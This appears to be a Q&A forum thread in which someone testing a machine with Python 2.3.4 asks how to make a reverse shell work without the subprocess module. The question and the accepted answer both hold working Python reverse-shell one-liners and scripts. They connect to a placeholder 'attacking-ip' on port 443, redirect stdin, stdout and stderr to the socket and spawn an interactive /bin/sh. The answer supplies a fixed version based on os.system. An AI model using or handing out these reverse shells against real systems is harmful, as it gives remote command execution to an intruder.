# Python Reverse shell without subprocess

Tags: python, subprocess

I am testing a machine that has Python 2.3.4 installed on it.

Using this one liner:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacking-ip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

which is :

```
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacking-ip",443));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

I get this error:

> Traceback (most recent call last):   File "", line 1, in ?
>   ImportError: No module named subprocess

I am now looking to create a script to provide a reverse connection. My issues/question would be if it is possible to do so with importing subprocess?

I have this so far

```
#!/usr/bin/python

import socket
import os

HOST = ''
PORT = ''

conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #CREATES TCP SOCKET

conn.connect((HOST, PORT)) #CONNECT

while 1: #LOOP
    ls = os.system('ls') # test with ls
#^ Need to add the ability to use any system command
command_send = conn.send(ls) #RECEIVE COMMAND
     #EXECUTE COMMAND
```

this loops forever haven't figured out how to stop loop with data received and keep script alive.

Answer (score 2, accepted):

[`subprocess`](https://docs.python.org/2/library/subprocess.html) module was introduced in Python 2.4.

---

[You can use `os.system` instead of `subprocess.call`](https://docs.python.org/2/library/subprocess.html#replacing-os-system):

```
import socket, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacking-ip", 443))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.system("/bin/sh -i")
```

---

```
python -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacking-ip",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.system("/bin/sh -i")'
```

Comment: Thank you! I will give this a try. Even if this does not work this answers my question.